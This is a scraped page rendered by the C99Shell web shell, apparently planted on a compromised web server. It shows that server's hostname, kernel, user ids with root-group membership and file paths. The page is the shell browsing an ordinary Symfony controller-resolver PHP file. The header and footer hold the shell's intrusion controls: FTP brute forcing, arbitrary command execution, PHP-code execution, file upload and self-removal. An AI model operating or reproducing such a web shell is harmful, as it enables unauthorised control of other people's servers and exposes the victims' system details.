!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/gateway.picotech.app/public_html/vendor/symfony/http-kernel/Controller/   drwxr-xr-x
Free 28.54 GB of 117.98 GB (24.19%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     ContainerControllerResolver.php (2.59 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php

/*
 * This file is part of the Symfony package.
 *
 * (c) Fabien Potencier <fabien@symfony.com>
 *
 * For the full copyright and license information, please view the LICENSE
 * file that was distributed with this source code.
 */

namespace Symfony\Component\HttpKernel\Controller;

use 
Psr\Container\ContainerInterface;
use 
Psr\Log\LoggerInterface;
use 
Symfony\Component\DependencyInjection\Container;

/**
 * A controller resolver searching for a controller in a psr-11 container when using the "service::method" notation.
 *
 * @author Fabien Potencier <fabien@symfony.com>
 * @author Maxime Steinhausser <maxime.steinhausser@gmail.com>
 */
class ContainerControllerResolver extends ControllerResolver
{
    protected 
$container;

    public function 
__construct(ContainerInterface $container, ?LoggerInterface $logger null)
    {
        
$this->container $container;

        
parent::__construct($logger);
    }

    protected function 
createController(string $controller)
    {
        if (
=== substr_count($controller':')) {
            
$controller str_replace(':''::'$controller);
            
trigger_deprecation('symfony/http-kernel''5.1''Referencing controllers with a single colon is deprecated. Use "%s" instead.'$controller);
        }

        return 
parent::createController($controller);
    }

    
/**
     * {@inheritdoc}
     */
    
protected function instantiateController(string $class)
    {
        
$class ltrim($class'\\');

        if (
$this->container->has($class)) {
            return 
$this->container->get($class);
        }

        try {
            return 
parent::instantiateController($class);
        } catch (
\Error $e) {
        }

        
$this->throwExceptionIfControllerWasRemoved($class$e);

        if (
$e instanceof \ArgumentCountError) {
            throw new 
\InvalidArgumentException(sprintf('Controller "%s" has required constructor arguments and does not exist in the container. Did you forget to define the controller as a service?'$class), 0$e);
        }

        throw new 
\InvalidArgumentException(sprintf('Controller "%s" does neither exist as service nor as class.'$class), 0$e);
    }

    private function 
throwExceptionIfControllerWasRemoved(string $controller\Throwable $previous)
    {
        if (
$this->container instanceof Container && isset($this->container->getRemovedIds()[$controller])) {
            throw new 
\InvalidArgumentException(sprintf('Controller "%s" cannot be fetched from the container because it is private. Did you forget to tag the service with "controller.service_arguments"?'$controller), 0$previous);
        }
    }
}

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0037 ]--